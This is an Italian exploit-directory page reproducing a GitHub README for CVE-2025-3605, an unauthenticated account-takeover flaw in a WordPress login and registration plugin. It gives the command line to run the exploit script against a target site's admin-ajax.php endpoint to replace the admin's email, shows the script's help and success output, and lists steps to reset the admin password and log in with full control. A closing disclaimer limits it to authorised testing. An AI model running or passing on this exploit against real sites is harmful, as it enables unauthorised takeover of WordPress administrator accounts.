Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-3605 — WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 è vulnerabile a Privilege Escalation | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-3605
Escalation di PrivilegiAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-3605

CVE-2025-3605

WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 è vulnerabile a Privilege Escalation

Vedi Repository
231 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚀 Guida allo Sfruttamento di CVE-2025-3605

🛡️ Riepilogo della Vulnerabilità

Il plugin Frontend Login and Registration Blocks per WordPress (versioni <= 1.0.7) è vulnerabile a escalation di privilegi tramite takeover dell'account.
Il problema nasce dal fatto che il plugin non convalida l'identità dell'utente quando aggiorna dettagli sensibili come l'email tramite la funzione flr_blocks_user_settings_handle_ajax_callback().

✅ Impatto:
Un attaccante non autenticato può modificare l'email dell'amministratore, attivare il processo di "Password dimenticata" e reimpostare la password dell'admin, ottenendo il controllo completo.


💥 Prova di Concetto (PoC)

Lo script Python incluso automatizza il processo di sfruttamento prendendo di mira l'endpoint AJAX vulnerabile:

root@kitploit:~
/wp-admin/admin-ajax.php

Aggiorna l'email dell'utente bersaglio (tipicamente user_id 1 per l'admin) con un'email controllata dall'attaccante.


📦 Script Incluso

Nome file: CVE-2025-3605.py

root@kitploit:~
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]

✅ Valori predefiniti:

  • --user_id: 1 (admin predefinito)
  • --mail: [email protected]

🖥️ Utilizzo e Aiuto

Per vedere il menu di aiuto, esegui:

root@kitploit:~
python CVE-2025-3605.py --help

Risultato:

root@kitploit:~
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]

Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target URL, e.g., http://192.168.100.74:888/wordpress
  --user_id, -id USER_ID
                        User ID to target (default: 1)
  --mail, -mail MAIL    Email to set (default: [email protected])

✅ Esecuzione di esempio:

root@kitploit:~
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]

🎯 Output Previsto

✅ In caso di successo:

root@kitploit:~
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )

❌ In caso di fallimento:

root@kitploit:~
[!] Exploit failed. HTTP Status: 400
[!] Response: 0

🔑 Dopo lo Sfruttamento

1️⃣ Naviga a:

root@kitploit:~
http://target-site/wordpress/wp-login.php

2️⃣ Inserisci la nuova email che hai impostato ([email protected]).

3️⃣ Richiedi un reset della password.

4️⃣ Imposta una nuova password.

5️⃣ Accedi come amministratore e goditi l'accesso completo.


⚠️ Dichiarazione di Non Responsabilità

Questo exploit e script sono forniti solo per scopi educativi e di test autorizzati.
Qualsiasi uso non autorizzato contro sistemi di cui non si è proprietari o per i quali non si ha esplicita autorizzazione a testare è illegale e non etico.


Di: Khaled Alenazi (Nxploited)

Scarica lo strumento